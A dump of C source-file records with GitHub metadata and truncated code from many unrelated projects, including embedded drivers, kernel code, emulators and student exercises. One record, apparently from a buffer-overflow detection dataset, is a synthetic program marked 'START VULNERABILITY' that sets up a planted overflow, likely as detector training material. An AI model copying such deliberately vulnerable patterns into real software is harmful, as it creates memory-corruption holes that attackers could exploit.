] | permissive | Jansonhuang/AmbiqSuite-R2.5.1 | 1bd2d3a8380c515f22056f599d363b23ec26ccba | 8dfe027bde3a00d9a7c3b1cefc7bbcf0597fefd5 | refs/heads/main | 2023-03-02T01:09:02.139963 | 2021-02-16T14:35:56 | 2021-02-16T14:35:56 | 338,343,491 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 11,022 | c | //*****************************************************************************
//
// am_hal_otp.c
//! @file
//!
//! @brief Functions for handling the OTP interface.
//
//*****************************************************************************
//*******************************************************************... | [
"jansonhuang1989@gmail.com"
] | jansonhuang1989@gmail.com |
d9526316a968bf3c0e629adde52c2cfa477388f9 | c3e386bb4867b7bbd28eaef0af6c100d7c3a8c58 | /a2-synchrotron-contiki/core/net/mac/chaos/service/unit-test/on-demand-test/on-demand-test.c | e94ab4c181a78676fe7d5258ea9229abe9f8bc42 | [
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license"
] | permissive | iot-chalmers/a2-synchrotron | 2b1977227c937863f0027ad0b4a31c2be538d8f0 | 1224860ff62db2e91af5ed0c6ab2da7ee66295d8 | refs/heads/cooja-main | 2021-01-01T16:58:31.204870 | 2017-11-08T10:51:30 | 2017-11-08T10:51:30 | 97,966,364 | 10 | 7 | BSD-3-Clause | 2019-06-18T12:24:01 | 2017-07-21T16:15:20 | C | UTF-8 | C | false | false | 4,479 | c | /*******************************************************************************
* BSD 3-Clause License
*
* Copyright (c) 2017 Beshr Al Nahas and Olaf Landsiedel.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the followin... | [
"beshr@chalmers.se"
] | beshr@chalmers.se |
dcaf9ae316d1ed034799083dd4ea437d5df53a50 | bfde3ce7aaebf2e5108d15e496808b5f51d145c0 | /CountSort/count_sort.c | d750bff7fe15cc1e6ac442ed8cf09d491a1d20f9 | [] | no_license | NikitaSkripchenko/Algorithms-and-DS-in-C | 1ea93b95d67cbf965176c53fd012f7354fe17f2d | ee3df0d62086fe17207bf4db168fc9d08a539161 | refs/heads/master | 2020-03-07T15:56:37.234398 | 2019-10-13T13:18:37 | 2019-10-13T13:18:37 | 127,568,520 | 58 | 9 | null | 2019-10-15T18:09:27 | 2018-03-31T20:25:45 | C | UTF-8 | C | false | false | 761 | c | #include <stdio.h>
const int MAX = 65536;
void print_array(int *array, int size) {
int curr;
for (curr = 0; curr < size; curr++) {
printf("%d, ", array[curr]);
}
printf("\n");
}
void count_sort(int value[], int n) {
int count[MAX];
for (int i = 0; i < MAX - 1; i++) {
count[i] ... | [
"frickadelka456@gmail.com"
] | frickadelka456@gmail.com |
8061b3d72e967afcf36476be66cf5ca463df30bc | 043ea32a0af81e2e7c134d08115b02c2a4ad3b69 | /iot_labb_i2c/build/gen/mgos_ro_vars.c | e63a8fe343fbd48b0c3fd0ba0d53fe7a1ade8c3a | [
"Apache-2.0"
] | permissive | sifr0013/IoT-Lab1 | 237cf78f0bc750ffb42e1bc795ba5ef1bc488292 | 5f06f3c69647d042dd6dda0da66739c801ccf048 | refs/heads/master | 2020-04-19T10:36:39.747089 | 2019-02-21T15:32:32 | 2019-02-21T15:32:32 | 168,145,190 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 2,558 | c | /* clang-format off */
/*
* Generated file - do not edit.
* Command: /mongoose-os/fw/tools/gen_sys_config.py --c_name=mgos_ro_vars --c_global_name=mgos_sys_ro_vars --dest_dir=/fwbuild-volumes/2.11.0/apps/iot_labb_i2c/esp32/build_contexts/build_ctx_655065916/build/gen/ /mongoose-os/fw/src/mgos_ro_vars_schema.yaml
*/
... | [
"sifr0013@student.umu.se"
] | sifr0013@student.umu.se |
1c425e0da078439163507290768b6dc68056568f | e60cc708dfca3c2561023cced7e0e62f67073e89 | /source/src/Z80JpIx.h | f0b338a7bb0530af80288610dc40f0828eea3bd4 | [] | no_license | jsmolina/SpecIde | e10e0112de22e622fe891e8c58ea2c0057824e84 | 78e15cc3c6b90b37fea4e457ffbbbf70aa9e74ce | refs/heads/master | 2020-03-27T05:05:42.941197 | 2018-08-23T20:43:04 | 2018-08-23T20:43:04 | 145,993,279 | 0 | 0 | null | 2018-08-24T13:12:28 | 2018-08-24T13:12:28 | null | UTF-8 | C | false | false | 162 | h | #pragma once
/** Z80JpIx.h
*
* JP (IX) Instruction.
*
*/
bool z80JpIx()
{
pc.w = ix.w;
prefix = PREFIX_NO;
return true;
}
// vim: et:sw=4:ts=4
| [
"sevillano.marta@gmail.com"
] | sevillano.marta@gmail.com |
6c3c0425ab12e9839ba499d3417f8d4529616dad | be27694239804f63c326b7a0c496b91391ad9edb | /usart_printf/include/usart_printf.h | 79a7f5f60bd401286c23c0b5ba8a7bc56654c4f0 | [] | no_license | machineagency/nucleo_tests | 3cb820827bf9bdf4e1450705bdfe8e4071784f02 | 81c4b363ef8074a52c8a8f18296230ffcbcaa4f1 | refs/heads/main | 2023-06-19T15:01:32.161879 | 2020-12-28T19:52:27 | 2020-12-28T19:52:27 | 314,681,944 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 758 | h | #ifndef USART_PRINTF_H
#define USART_PRINTF_H
#include <libopencm3/stm32/usart.h>
#include <libopencm3/stm32/rcc.h>
#include <libopencm3/stm32/gpio.h>
#include <cstdio>
/**
* Consume a USART peripheral for output via the printf(..) function.
* This is useful for debugging and status information.
*
* TODO: support b... | [
"seeifyoucanmeetme@gmail.com"
] | seeifyoucanmeetme@gmail.com |
fd4db2a1a07219e8614124565c064a14ef4a2ea8 | 16d079cf327225db5587e7eb59039d23d496cb25 | /src/boot/ksdk1.1.0/glcdfont.h | 43d511da7973db8ef149786ebcd85bc2e7f25191 | [
"BSD-3-Clause"
] | permissive | JHollandaise/Warp-firmware | a55cc455a25a2866c6c9802844cd4a079d4065e4 | edc084933611704f3ed66ed8741d1571541ed7f2 | refs/heads/master | 2020-09-05T03:31:04.501760 | 2020-01-18T14:05:39 | 2020-01-18T14:05:39 | 219,969,687 | 0 | 0 | BSD-3-Clause | 2019-11-06T10:21:08 | 2019-11-06T10:21:08 | null | UTF-8 | C | false | false | 9,887 | h | /*
Software License Agreement (BSD License)
Copyright (c) 2012 Adafruit Industries. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright no... | [
"jh2044@cam.ac.uk"
] | jh2044@cam.ac.uk |
a7ef5f3fcfc5f675a8af715e2633a84e41f15ded | 958488bc7f3c2044206e0358e56d7690b6ae696c | /c/tlpi/copy.c | 1a1936c5110a9090489fc2d8560f6e320725f8d8 | [] | no_license | possientis/Prog | a08eec1c1b121c2fd6c70a8ae89e2fbef952adb4 | d4b3debc37610a88e0dac3ac5914903604fd1d1f | refs/heads/master | 2023-08-17T09:15:17.723600 | 2023-08-11T12:32:59 | 2023-08-11T12:32:59 | 40,361,602 | 3 | 0 | null | 2023-03-27T05:53:58 | 2015-08-07T13:24:19 | Coq | UTF-8 | C | false | false | 1,184 | c | #include <sys/stat.h>
#include <fcntl.h>
#include "tlpi_hdr.h"
#ifndef BUF_SIZE
#define BUF_SIZE 1024
#endif
/* Allow "cc -D" to override definition */
int
main(int argc, char *argv[])
{
int inputFd, outputFd, openFlags;
mode_t filePerms;
ssize_t numRead;
char buf[BUF_SIZE];
if (argc != 3 || strcmp(argv[1], ... | [
"paul_ossientis@riseup.net"
] | paul_ossientis@riseup.net |
47c600250bb9b51fae146c9879fa71b5e442e0eb | 598737b786a20889dc6acd468478baf4972535b3 | /src/sys/arch/hp300/stand/common/itevar.h | 193ffdea9ca9c36a65bf58269ea6b7cf97b73576 | [] | no_license | shisa/shisa-netbsd | 5c8e289de2a48b6d8f39bd3add9ca4ea48fec1da | 28d999d1c25107c126e0a458a97b9397aae592ef | refs/heads/master | 2021-01-01T05:33:32.619808 | 2008-05-26T04:27:54 | 2008-05-26T04:27:54 | 32,793,680 | 1 | 2 | null | null | null | null | UTF-8 | C | false | false | 9,513 | h | /* $NetBSD: itevar.h,v 1.3 2003/11/14 16:52:40 tsutsui Exp $ */
/*
* Copyright (c) 1990, 1993
* The Regents of the University of California. All rights reserved.
*
* This code is derived from software contributed to Berkeley by
* the Systems Programming Group of the University of Utah Computer
* Science Departm... | [
"keiichi@mobilegravity.sfc.wide.ad.jp"
] | keiichi@mobilegravity.sfc.wide.ad.jp |
91ded9aaa911aac699e818b2d0e96a3049fbd00c | e24b5ced08861a6219020e86d46a522d5a7c5ae5 | /sample-native-unity-apps/ios/UnityComponent/Classes/Native/mscorlib_System_Collections_Generic_Dictionary_2_gen_13.h | dccdabe22b231f94937e9683eaa973702900c788 | [] | no_license | AndreaMelle/UnityNativeIntegrationScoping | 10579125b088c867e1549c5732a458ced73af41c | 6b551828520bb178ff19a99398a678f3789386f2 | refs/heads/master | 2021-01-13T00:52:13.151928 | 2015-10-28T17:09:59 | 2015-10-28T17:09:59 | 44,184,426 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 2,548 | h | #pragma once
#include "il2cpp-config.h"
#ifndef _MSC_VER
# include <alloca.h>
#else
# include <malloc.h>
#endif
#include <stdint.h>
// System.Int32[]
struct Int32U5BU5D_t162;
// System.Collections.Generic.Link[]
struct LinkU5BU5D_t2323;
// Vuforia.Marker[]
struct MarkerU5BU5D_t2924;
// System.Collections.Generic.I... | [
"andreamelle@Andreas-MacBook-Pro.local"
] | andreamelle@Andreas-MacBook-Pro.local |
a93ee044c8e0a86b65cbd64e8bca2c4ec64dce29 | ef23e388061a637f82b815d32f7af8cb60c5bb1f | /src/mess/drivers/dai.c | d7642cc8b4275b08d6f666ee69e77f49903d3f47 | [] | no_license | marcellodash/psmame | 76fd877a210d50d34f23e50d338e65a17deff066 | 09f52313bd3b06311b910ed67a0e7c70c2dd2535 | refs/heads/master | 2021-05-29T23:57:23.333706 | 2011-06-23T20:11:22 | 2011-06-23T20:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 12,175 | c | /*******************************************************************************
DAI driver by Krzysztof Strzecha and Nathan Woods
What's new:
-----------
21.05.2004 TMS5501 fixes. Debug code cleanups.
06.03.2004 Stack overflow interrupt added.
05.09.2003 Random number generator added. Few video hardware bugs fixe... | [
"Mike@localhost"
] | Mike@localhost |
64d6eee4b064fa83dd0f0d6f543904f6580faed5 | da270fd37200ed1e726ad21633f36edf7b4a5a46 | /Cpp/C++/mySirg/app12.c | 7b96c7b8d5841b7b75a74e7730991ace3b0d3639 | [] | no_license | AnujKumarsla/C- | fca69c64005e3ba29cb207f350bf2525b2b1dcdc | 065b402d510d581bc70bcba40f44a7487323ec2e | refs/heads/main | 2023-03-01T06:18:42.275593 | 2021-02-16T12:25:39 | 2021-02-16T12:25:39 | 333,763,960 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 439 | c | // structure with member variables and function
#include<iostream>
using namespace std;
struct book{
int bid;
float price;
char title[20];
void input(){
cout<<"Enter the Name, id , price ";
cin>>title>>bid>>price;
}
void show(void){
cout<<"Book : \nName : "<<title<<"\... | [
"ianujkumars123@gmail.com"
] | ianujkumars123@gmail.com |
5d88664e7deeab5375679086aad3db0800001c47 | f026cb616ef14bae15a1d251ca6dbe0f55016d9c | /linux/7131.c | ca4e984e154cd740e2eb031548de869ddab65549 | [] | no_license | jajajasalu2/cocci-lkmp-c-files | 3eb7d451929dca5cb6beb56aabd69fe3f7fc176c | 5da943aabe1589e393a131121dbf8e7a84b3cf2a | refs/heads/master | 2020-12-02T17:30:14.411816 | 2020-01-29T08:36:30 | 2020-01-29T08:36:30 | 231,053,574 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,751 | c | cocci_test_suite() {
struct xen_front_pgdir_shbuf_cfg *cocci_id/* drivers/xen/xen-front-pgdir-shbuf.c 517 */;
struct xen_front_pgdir_shbuf_ops {
void (*calc_num_grefs)(struct xen_front_pgdir_shbuf *buf);
void (*fill_page_dir)(struct xen_front_pgdir_shbuf *buf);
int (*grant_refs_for_buffer)(struct xen_front_pgdi... | [
"jaskaransingh7654321@gmail.com"
] | jaskaransingh7654321@gmail.com |
bc77f765b8b0da41870196d826f17019c46ade15 | 2d362d231c499b35367c19c708463de86a184f78 | /Frameworks/OmniFoundation/FileManagement.subproj/OFDocumentEncryption-ObjC.h | 7ed039c04c7b946d65c214842592b6361248c96b | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | moJiXiang/OmniGroup | 328cb418193353aa6b6e11245a155d6ec437466f | 48ae64ed97289d3384828fb93d11fe81a34fafd1 | refs/heads/master | 2021-01-19T15:39:32.550809 | 2016-09-30T20:49:42 | 2016-09-30T21:35:09 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 486 | h | // Copyright 2016 Omni Development, Inc. All rights reserved.
//
// This software may only be used and reproduced according to the
// terms in the file OmniSourceLicense.html, which should be
// distributed with this project and can also be found at
// <http://www.omnigroup.com/developer/sourcecode/sourcelicense/>.
//
... | [
"tjw@omnigroup.com"
] | tjw@omnigroup.com |
f5cbf92e481f7c3f61b7f1cab2345014c86a1e51 | 36a8add8341e701f1305edab6d00094d48888efa | /sys/external/bsd/drm2/dist/drm/i915/i915_gem.c | 61cfffa76e28dede91a6871bb313d25be6c1f61e | [] | no_license | enukane/netbsd-src | 0c23bfdf6d2d69fdf9e3e49737c3accf9a85c636 | 179a745efb7674c62fed6fb48ea1b87e9e4c1200 | refs/heads/master | 2021-01-20T21:35:11.918952 | 2014-06-12T03:23:58 | 2014-06-12T03:23:58 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 127,936 | c | /*
* Copyright © 2008 Intel Corporation
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, pub... | [
"riastradh@netbsd.org"
] | riastradh@netbsd.org |
832721cb2ee584a1d97bea3b79fa937af6dfdd78 | 43234eec58339bf0846ed3406d5d32bd7f7e7dd2 | /common/xen-tools/firmware/hvmloader/acpi/build.c | 3b922cde4079e142f4eb07b0d4602678100cbab8 | [] | no_license | vkkevin/uxen | d7cf62e4f2b670d33c416e71033cb4987c2b46f6 | 9bc774601c6ea9f3c78a5f6ee50db37b4a8315f2 | refs/heads/master | 2023-06-15T07:26:46.089999 | 2018-07-19T10:04:01 | 2018-07-19T10:04:01 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 18,289 | c | /*
* Copyright (c) 2004, Intel Corporation.
* Copyright (c) 2006, Keir Fraser, XenSource Inc.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms and conditions of the GNU General Public License, version
* 2, as published by the Free Software Foundation.
*
* Th... | [
"hudson@trmm.net"
] | hudson@trmm.net |
f25fd694150bcaa42db25658752bf78fe90846bc | 09c98119a5fbaf5b89891e6ca009d2258028b724 | /Projects/STM32F401-Discovery/Examples/I2C/I2C_TwoBoards_ComDMA/Src/main.c | fdf6b870a02fa99e81e00610a0a85ac81c156dbf | [
"BSD-2-Clause"
] | permissive | koson/STM32Cube_FW_F4 | bf20f632625181189ea0b47e96653117a8946cd9 | 58e9769a397768882632079863e2453803951a82 | refs/heads/master | 2020-12-05T02:03:49.120409 | 2019-09-21T06:45:53 | 2019-09-21T06:45:53 | null | 0 | 0 | null | null | null | null | MacCentralEurope | C | false | false | 14,456 | c | /**
******************************************************************************
* @file I2C/I2C_TwoBoards_ComDMA/Src/main.c
* @author MCD Application Team
* @version V1.2.5
* @date 29-January-2016
* @brief This sample code shows how to use STM32F4xx I2C HAL API to transmit
* and rec... | [
"vuhungkt18@gmail.com"
] | vuhungkt18@gmail.com |
8f411c813f29e5482210ca949296e2872ede9f3c | e313e36207f145df485f89bd807b31c0a104fd51 | /0x02-functions_nested_loops/10-add.c | e7f582854628d3617546a1dc2370d164322917e3 | [] | no_license | Vivian-Alemba/alx-low_level_programming | cae78147551490853f2f57b8b2a9a234e1317004 | 76d5ff04751f476a8930651f2a71227b7055e19d | refs/heads/master | 2023-08-18T10:43:43.944388 | 2021-10-21T20:30:56 | 2021-10-21T20:30:56 | 400,149,988 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 296 | c | #include "main.h"
/**
* add - function that adds two integers and returns the result.
* @a: The character printed on the screen
* @b: The character printed on the screen
*
* Return: the sum of the two integers.
*/
int add(int a, int b)
{
int result;
result = a + b;
return (result);
}
| [
"alembavivianauma@gmail.com"
] | alembavivianauma@gmail.com |
95678b291d905d700e3baccc70a2d4329a87a521 | 7d4176c878e8be73ffaa38c236f1a76528706c9f | /src/gnu/usr.sbin/sendmail/libsm/vfscanf.c | eb42b8a6ffcf694d74907acfede7c428a3a7650f | [
"Sendmail",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | roytam1/mirbsd-cvs | c06ea23d2b106658f9903fe65d351c480b72e72c | 2a6f84cbc58f6ff22e1eeb7804df68d34c2b0a5c | refs/heads/master | 2020-04-14T15:47:25.324452 | 2019-01-01T19:38:30 | 2019-01-01T19:38:30 | 163,906,352 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 19,183 | c | /*
* Copyright (c) 2000-2001, 2004 Proofpoint, Inc. and its suppliers.
* All rights reserved.
* Copyright (c) 1990, 1993
* The Regents of the University of California. All rights reserved.
*
* This code is derived from software contributed to Berkeley by
* Chris Torek.
*
* By using this file, you agree t... | [
""
] | |
1ba002318bf4dcff9920048e7b92322a55123f77 | 6e3ea0a8dac06a30f875e92d08c08f51b5ef1d63 | /CupSensor_IF/OpticSensorMixer.cydsn/main.c | da2fa0a6c87477e2fd7b83fa9fa896f296536b33 | [] | no_license | prj3grp7/player_side_app | 76f5d6e99b21f495e22db307ca4ed2c92564c657 | 5b0740cccb2d016558757a1839e2b6fa982f1aa7 | refs/heads/master | 2020-04-27T03:23:59.353587 | 2019-03-05T21:41:19 | 2019-03-05T21:41:19 | 174,023,452 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 6,550 | c | /* ========================================
*
* Copyright YOUR COMPANY, THE YEAR
* All Rights Reserved
* UNPUBLISHED, LICENSED SOFTWARE.
*
* CONFIDENTIAL AND PROPRIETARY INFORMATION
* WHICH IS THE PROPERTY OF your company.
*
* ========================================
*/
#include "project.h"
typedef enum
{
... | [
"mrgasberg@hotmail.com"
] | mrgasberg@hotmail.com |
17d6d7980bf7f0d80b4b2999900f3f962c4a4919 | 734ae40f70bcc8d24e44057d086d8ba171f3afc5 | /csci335/programming2-myls/shelper.h | 7b5ab8b89667189cb135714b91158c6d17a56aa1 | [] | no_license | ethangreen-dev/unca-csci | fd51ed5350d65a451386aa11c2511e312ce042f2 | 9fecbfa388c81a2cf188d17db5efea52b9c7b1fa | refs/heads/master | 2023-03-07T11:16:27.937759 | 2020-11-28T17:05:43 | 2020-11-28T17:05:43 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 92 | h | #ifndef SHELPER_H
#define SHELPER_H
int smaller_than(char *string1, char *string2);
#endif | [
"egreen4@unca.edu"
] | egreen4@unca.edu |
e03118ffc4f54c6935e668e9eacd93f0c6c6dac1 | 74ebe1e2a4c1b2af89dbab19cff59e8536ef80cf | /lab3/main.c | 6938ebfd3637d986a4fb702e758ca8f15edc47c0 | [] | no_license | JianXinyu/ENGI9875 | 2a2fc13360d10d2749522a887b1c9d67813724aa | 58e5e20727ddde61fe319b738a6ef6b64a3a7638 | refs/heads/main | 2023-04-20T19:40:13.689108 | 2021-05-09T03:29:00 | 2021-05-09T03:29:00 | 332,061,256 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 2,007 | c | /*-
* Copyright 2018 Jonathan Anderson
*
* Permission to use, copy, modify, and/or distribute this software for any
* purpose with or without fee is hereby granted, provided that the above
* copyright notice and this permission notice appear in all copies.
*
* THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISC... | [
"jianxinyu626@gmail.com"
] | jianxinyu626@gmail.com |
48556cd5945a287c4ba0d2c012fbd73ca3b94b51 | 341b399ddfc146eb87485e3dfdb64986462f0303 | /src/ch14/complit.c | 92b811b7ce536b71986ae5369f998e2019c6f4a8 | [] | no_license | VimIcewind/CPrimerPlus | 8fb5ce379f5ad16f2ecb68215d7cb7ff9189cb08 | d4627b9224f34ca51b686b4226aa5b06789ea433 | refs/heads/master | 2023-02-19T19:40:00.139972 | 2020-12-11T07:39:30 | 2020-12-11T07:39:56 | 278,995,859 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 620 | c | /* complit.c -- 复合字面量 */
#include <stdio.h>
#define MAXTITL 41
#define MAXAUTL 31
struct book {
char title[MAXTITL];
char author[MAXAUTL];
float value;
};
int main(void)
{
struct book readfirst;
int score;
printf("Enter test score: ");
scanf("%d", &score);
if (score >= 84)
readfirst = (struct book) { "Cr... | [
"VimIcewind@gmail.com"
] | VimIcewind@gmail.com |
f25f62a0c59dee51cde53dc3c551c4570b6d525f | 23693ce4ad3eca0c208f01f5e872c6e99e1edb69 | /DarkSUSY_mH_125/mGammaD_0350/cT_500/DarkSusy_mH_125_mGammaD_0350_cT_500_LHE_muon_p.C | 29e246028bb5163f6c7b9601b67743a72fb65c65 | [] | no_license | cms-tamu/MuJetAnalysis_DarkSusySamples_LHE_13TeV_02 | a6a1790ba62583e4693747e7162478f4688aa9a9 | ef31123e5b3f19e8a9621fa519f81105a500c3a9 | refs/heads/master | 2021-01-22T20:19:03.826804 | 2015-03-18T13:59:43 | 2015-03-18T13:59:43 | 30,620,024 | 0 | 1 | null | null | null | null | UTF-8 | C | false | false | 58,728 | c | {
//=========Macro generated from canvas: cnv/cnv
//========= (Mon Mar 16 13:07:45 2015) by ROOT version5.34/18
TCanvas *cnv = new TCanvas("cnv", "cnv",1320,22,904,928);
gStyle->SetOptFit(1);
gStyle->SetOptStat(0);
gStyle->SetOptTitle(0);
cnv->SetHighLightColor(2);
cnv->Range(-26.5625,-0.02303231,129... | [
"bmichlin@rice.edu"
] | bmichlin@rice.edu |
dc8a1b24080197774db3dec2e89cc0692423779e | eb1fa21273e35406f56791a93672ffa78bc19230 | /src/kernel/uart.c | 754d7619872a319809bb403dbd7dd5d6d8703462 | [
"Apache-2.0"
] | permissive | TomoakiNagahara/cyanurus | 0f6b167f223d231b98e8d72b0aa3c87258e70ee0 | 233ef4d1f34bc7a1478f228d9aad00b04500e478 | refs/heads/master | 2020-12-30T23:10:39.135667 | 2016-11-28T15:38:40 | 2016-11-28T15:38:40 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 2,711 | c | /*
Copyright 2014 Akira Midorikawa
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, softwar... | [
"redcap97@gmail.com"
] | redcap97@gmail.com |
c997c85c671834e4f8a523203c248c32d3c8b61c | 5586f25ea0bea84b66f53333d96ae58650f9daa4 | /Chp05/Code/basel.c | 7c081f757815e2f82b2eaead03f510361785d27b | [
"MIT"
] | permissive | dmitrijsc/Mastering-Julia-1.0 | 10f1eb2c79f8dfd1f51bcbd5dc2c41ffa1e02758 | 375342d933a48142b5b605b9c39cb5922e010691 | refs/heads/master | 2020-12-21T15:38:09.993843 | 2019-06-25T18:29:55 | 2019-06-25T18:29:55 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 541 | c | /*
cc -c basel.c
libtool -dynamic basel.o -o libmyfuns.dylib -framework CoreFoundation -lSystem -macosx_version_min 10.12
sudo cp libmyfuns.dylib /usr/local/lib
*/
#include<stdio.h>
#include<stdlib.h>
double basel(int N) {
double s = 0.0L;
int i;
double x;
if (N < 1) return s;
for (i = 1; i <= N; i++) {
... | [
"malcolm@amisllp.com"
] | malcolm@amisllp.com |
3b46d6f897912759e0a738c6160b76932bbf3ab3 | b42e29928780786b5d93048003edf664e9da363d | /cube_gouraud.c | eb1c3780294a0499a12cbeff0d2b779f881c0c5e | [] | no_license | Caroline-xinyue/Graphics_hw5 | 470810a442fa77f85764948e9c09810d095da577 | 0a1fe2ecd4207c559e3dee4540b95d8358180578 | refs/heads/master | 2021-01-12T12:15:20.320769 | 2016-11-01T07:39:04 | 2016-11-01T07:39:04 | 72,390,841 | 0 | 0 | null | 2016-10-31T02:25:54 | 2016-10-31T02:25:54 | null | UTF-8 | C | false | false | 11,759 | c | //
// triangle.c
//
//
// Created by Xinyue Zhang on 10/7/16.
//
//
#include <glm/glm.hpp>
#include <glm/gtc/matrix_transform.hpp>
#include <glm/gtc/type_ptr.hpp>
#include "glm/ext.hpp"
#include <iostream>
#include <stdio.h>
#include <stdlib.h>
#include "common.h"
#define BOID_RADIUS 0.5
#define CUBE_SIZE 1
#defin... | [
"noreply@github.com"
] | Caroline-xinyue.noreply@github.com |
27925bcd0b958ce3c151d4e4e5177cb321973d96 | 5c255f911786e984286b1f7a4e6091a68419d049 | /vulnerable_code/ca4b998a-5443-4223-8a3b-c528af1a2d0a.c | 8ac2ff78d96efac7ba1938a101d9ed5bfe1d4fee | [] | no_license | nmharmon8/Deep-Buffer-Overflow-Detection | 70fe02c8dc75d12e91f5bc4468cf260e490af1a4 | e0c86210c86afb07c8d4abcc957c7f1b252b4eb2 | refs/heads/master | 2021-09-11T19:09:59.944740 | 2018-04-06T16:26:34 | 2018-04-06T16:26:34 | 125,521,331 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 534 | c | #include <string.h>
#include <stdio.h>
int main() {
int i=4;
int j=14;
int k;
int l;
k = 533;
l = 64;
k = i/j;
l = i/j;
l = k%j;
l = l-j;
l = k-k*i;
//variables
/* START VULNERABILITY */
int a;
int b[43];
int c[77];
a = 0;
do {
/* START BUFFER S... | [
"nharmon8@gmail.com"
] | nharmon8@gmail.com |
70e09f3f354dc06345063790189e2c3a285460c5 | 8211a964549d7f5a7c0af6425ac566c5ff0a3ad8 | /material/passing/CtoLV.c | 5a6dec4a64616cb9d2632e3939161fb545f2d86e | [] | no_license | Z-eddy/CppDllForLv | 377538042cac27a6023c149669e981cfc20f4f72 | c86e8a2182e02d61ffbe3ff5d91bbc8664128b39 | refs/heads/master | 2022-10-06T10:37:51.695459 | 2020-06-10T06:30:57 | 2020-06-10T06:30:57 | 270,165,721 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 7,360 | c | #include "CtoLV.h"
// Changes the contents of a 1-D array NOTE LV passes the data as a double*, so no size information is available
// and the additional paramter size tells us how many elements were in the LV array.
int32 Modify1DArray(double* in_array, int32 size)
{
//If you don't modify the size of the array pass... | [
"576172400@qq.com"
] | 576172400@qq.com |
f7af6d5375d2affb0389f42f263e065ee5b4514d | 976f5e0b583c3f3a87a142187b9a2b2a5ae9cf6f | /source/linux/drivers/media/usb/gspca/extr_se401.c_sd_pkt_scan_bayer.c | 64d376437cdefb2ac75f1f5bb96e47d8e97a6a3a | [] | no_license | isabella232/AnghaBench | 7ba90823cf8c0dd25a803d1688500eec91d1cf4e | 9a5f60cdc907a0475090eef45e5be43392c25132 | refs/heads/master | 2023-04-20T09:05:33.024569 | 2021-05-07T18:36:26 | 2021-05-07T18:36:26 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,338 | c | #define NULL ((void*)0)
typedef unsigned long size_t; // Customize by platform.
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__; // Either arithmetic or pointer type.
/* By default, we understand bool (as a convenience). */
typedef int bool;
#define false 0
#define true 1
/* Forward d... | [
"brenocfg@gmail.com"
] | brenocfg@gmail.com |
94f04bef63fcc4f1486ef72fa1e176971023190b | 8d7514271b08caaa8c757d0747853d54642e9e63 | /plutommi/MtkApp/RightsMgr/RightsMgrSrc/RightsMgrSweep.c | cd93b43d905dbd96991575d346d4bb0ca7a72b36 | [] | no_license | npnet/MyCode | 0bd3e32d5890c411b16e01cdb8acf5624c7c0a02 | 9fa7aa78d62f1cd3c2a39a36875cb41cf00522fe | refs/heads/master | 2023-07-23T13:19:29.575050 | 2018-07-05T13:01:09 | 2018-07-05T13:01:09 | 140,229,839 | 1 | 2 | null | 2023-07-21T10:21:01 | 2018-07-09T04:07:28 | C | UTF-8 | C | false | false | 72,916 | c | /*****************************************************************************
* Copyright Statement:
* --------------------
* This software is protected by Copyright and the information contained
* herein is confidential. The software may not be copied and the information
* contained herein may not be used or dis... | [
"zhaoran.jia@nbbsw.com"
] | zhaoran.jia@nbbsw.com |
20156ec0b8b0277d1046d0d498933c3627190a09 | ed199e53fc491397c4e0de25dc68c8af05322b59 | /Generated_Source/PSoC4/GLCD_1_SPIM_SCB_mosi_m.h | 3d32d6eabb030d1971f5b45a57e8273d2fd4e11c | [] | no_license | sanderzinc/Starblasters | 3f51ca048518623c8e5f602d3d4ba23e6a4e8d11 | 86d0fdb015a677537830cab754e0719289702f79 | refs/heads/master | 2020-07-05T03:51:14.621140 | 2015-06-26T21:52:34 | 2015-06-26T21:52:34 | 38,135,666 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 3,744 | h | /*******************************************************************************
* File Name: GLCD_1_SPIM_SCB_mosi_m.h
* Version 1.90
*
* Description:
* This file containts Control Register function prototypes and register defines
*
* Note:
*
**************************************************************************... | [
"sanderst@spu.edu"
] | sanderst@spu.edu |
